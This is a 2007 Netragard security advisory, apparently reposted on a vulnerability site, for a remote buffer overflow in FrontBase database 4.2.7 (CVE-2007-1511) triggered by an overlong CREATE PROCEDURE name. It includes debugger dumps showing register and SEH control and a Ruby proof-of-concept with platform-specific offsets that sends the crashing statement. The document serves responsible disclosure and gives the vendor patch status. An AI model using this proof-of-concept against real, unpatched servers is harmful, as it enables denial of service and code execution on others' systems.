FrontBase Database <= 4.2.7 ALL PLATFORMS REMOTE BUFFER OVERFLOW CONDITION]

2007.03.26
Credit: Netragard Security Advisories
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2007-1511
CWE: CWE-Other


CVSS Base Score: 7.1/10
Impact Subscore: 10/10
Exploitability Subscore: 3.9/10
Exploit range: Remote
Attack complexity: High
Authentication: Single time
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ******************** Netragard, L.L.C Advisory* ******************* Strategic Reconnaissance Team ------------------------------------------------ http://www.netragard.com -- "We make I.T. Safe." [Advisory Information] - ----------------------------------------------------------------------- Contact : Adriel T. Desautels Researcher : Kevin Finisterre Advisory ID : NETRAGARD-20070316 Product Name : FrontBase Relational Database Server Product Version : <= FrontBase 4.2.7 (All Platforms) Vendor Name : FrontBase, Inc. Type of Vulnerability : Remote Buffer Overflow Effort : Easy [POSTING NOTICE] - ----------------------------------------------------------------------- If you intend to post this advisory on your web page please create a clickable link back to the original Netragard advisory as the contents of the advisory may be updated. <a href=http://www.netragard.com/html/recent_research.html> Netragard Research </a> [About Netragard] - ----------------------------------------------------------------------- Netragard is a unique I.T. Security company whose services are fortified by continual vulnerability research and development. This ongoing research, which is performed by our Strategic Reconnaissance Team, specifically focuses on Operating Systems, Software Products, Security Appliances, Network Appliances, and Web Applications commonly found in businesses internationally. We apply the knowledge gained by performing this research to our professional security services. This in turn enables us to produce high quality deliverables that are the product of talented security professionals and not those of automated scanners and tools. This advisory is the product of research done by the Strategic Reconnaissance Team. [Product Description] - ----------------------------------------------------------------------- "FrontBase is the only enterprise level relational database server that was created in the Internet age, by Internet professionals specifically to meet and exceed the demands of today's new economy." - -- http://www.frontbase.com/ -- [Technical Summary] - ----------------------------------------------------------------------- Any user with access to the FrontBase SQL command prompt and sufficient privileges to create a stored procedure may be able to exploit a buffer overflow condition in the parsing of 'CREATE PROCEDURE' SQL requests. Successful exploitation may result in arbitrary code execution or a denial of service condition. [Technical Details] - ----------------------------------------------------------------------- An exploitable vulnerability exists in FrontBase that can be used to gain NT AUTHORITYSYSTEM or root privileges on an affected system. This vulnerability exists within the creation Stored Procedures. If a user creates a procedure with a very long name FrontBase will crash due to memory corruption. Memory can be corrupted in such a way that an attacker can run arbitrary code. The following example buffer can be used to trigger the vulnerability: create procedure "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa .... aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"() begin end; Upon parsing the final ';' in the statement the database will trigger an exception and crash. Example: FrontBase currently runs on the following variety of platforms: Mac OS X Server 10.x Mac OS X Server 1.2 RedHat SuSE YellowDog Linux Debian Linux Mandrake Linux FreeBSD Solaris HP-UX Windows Windows NT Windows 2000 Below are a few examples of debugger output which highlight the bug. On the windows Platform one of two things are possible. First we can overwrite the SEH Handler with an address of our choosing. Because we also overwrite EDI when we smash the SEH we will trigger an exception. This enables us to inject a malicious exception handler. EAX 00000000 ECX FFFFFFFF EDX 01863214 EBX 01863484 ESP 0196F344 EBP 018666D8 ESI 01863E0C EDI 41414141 EIP 0043BE6D FrontBas.0043BE6D SEH chain of thread 00000D3C Address SE handler 0196FFA4 04030201 The other option on windows is to simply overwrite the EIP address. This method may not be as straight forward due to limited register control. It may be possible to jump into ESP and make use of a small 7 byte buffer as leverage to reach the attackers shellcode of choice. EAX 01863E0C ECX 0099FD30 EDX 0099FD30 EBX 00000121 ESP 0196F480 EBP 00000000 ESI 01863484 EDI 018666A4 EIP 44434241 0196F478 41414141 0196F47C 44434241 0196F480 04030201 <---- Value at ESP (4 bytes) 0196F484 5F070605 <---- Value at ESP (3 bytes) Under OSX we appear to smash the saved return address and its accompanying frame. We also seem to have some control over the first frame as well. k-s-computer-:/Users/kf root# gdb /Library/FrontBase/bin/FrontBase -q Reading symbols for shared libraries .... done (gdb) r newDB Starting program: /Library/FrontBase/bin/FrontBase newDB Reading symbols for shared libraries . done 2007-03-12 12:01:25 License problem detected: Using the unlicensed FREE version options 2007-03-12 12:01:25 FrontBase Server - 4.2.7 on Mac OS X [Server] 2007-03-12 12:01:25 Transaction Log disabled Program received signal EXC_BAD_ACCESS, Could not access memory. Reason: KERN_INVALID_ADDRESS at address: 0x44434335 [Switching to process 2468 thread 0x2003] 0x000c6688 in ?? () (gdb) bt #0 0x000c6688 in ?? () #1 0x41414141 in ?? () (gdb) x/i $eip 0xc6688: mov %edx,244(%eax) (gdb) i r eax 0x44434241 1145258561 ecx 0x0 0 edx 0x486690 4744848 ebx 0x4886d0 4753104 esp 0xb02f3290 0xb02f3290 ebp 0xb02f32d8 0xb02f32d8 esi 0x44434241 1145258561 edi 0xb02f3334 -1339083980 eip 0xc6688 0xc6688 eflags 0x10286 66182 cs 0x17 23 ss 0x1f 31 ds 0x1f 31 es 0x1f 31 fs 0x0 0 gs 0x37 55 (gdb) i f Stack level 0, frame at 0xb02f3294: eip = 0xc6688; saved eip 0x41414141 called by frame at 0x41414149 Arglist at 0xb02f328c, args: Locals at 0xb02f328c, Previous frame's sp is 0xb02f3294 Saved registers: ebp at 0xb02f328c, eip at 0xb02f3290 (gdb) frame 1 #1 0x41414141 in ?? () (gdb) i r eax 0x44434241 1145258561 ecx 0x0 0 edx 0x486690 4744848 ebx 0x4886d0 4753104 esp 0xb02f3294 0xb02f3294 ebp 0x41414141 0x41414141 esi 0x44434241 1145258561 edi 0xb02f3334 -1339083980 eip 0x41414141 0x41414141 eflags 0x10286 66182 cs 0x17 23 ss 0x1f 31 ds 0x1f 31 es 0x1f 31 fs 0x0 0 gs 0x37 55 [Proof Of Concept] - ----------------------------------------------------------------------- #!/usr/bin/ruby require "frontbase" connection = FBSQL_Connect.connect("192.168.0.6", -1, "newDB", "_system", "", "", "") # Windows XP Sp2 - SEH hit. b00m = 'create procedure "' + 'A'*3115 + "x01x02x03x04" + '"() ' + 'begin ' + 'end;' # Windows XP Sp2 - EIP hit and control of data at ESP. # b00m = 'create procedure "' + 'A'*255 + "ABCD" + "x01x02x03x04x05x06x07" + '"() ' + 'begin ' + 'end;' # OSX 10.4.8 control of EAX and ESI in frame 0, control of EAX EBP ESI and EIP in frame 1 # b00m = 'create procedure "' + 'A'*291 + "0123" + "ABCD" + '"() ' + 'begin ' + 'end;' # OSX - x86 connection.exec(b00m) [Vendor Status] - ----------------------------------------------------------------------- Vendor Notified on 03/08/07 Vendor Patched on 03/09/07 Vendor has stated the following: Thx. for the report, the bug has been fixed and the fix will be in the next general release. An error like this will be generated: Syntax error 005. The length of a regular identifier is not to exceed 128 characters. Exception 363 (40:000). Transaction rollback. [Disclaimer] - ----------------------http://www.netragard.com------------------------- Netragard, L.L.C. assumes no liability for the use of the information provided in this advisory. This advisory was released in an effort to help the I.T. community protect themselves against a potentially dangerous security hole. This advisory is not an attempt to solicit business. <a href="http://www.netragard.com> http://www.netragard.com </a> -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.5 (Darwin) iD8DBQFF+wHiQwbn1P9Iaa0RAiJ3AJ4jAGglza+4PuH5P1PF3z2ebpZ/GgCbBxSs 2gpgltsr3ugv8xi52xj7cx4= =c9QZ -----END PGP SIGNATURE-----


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top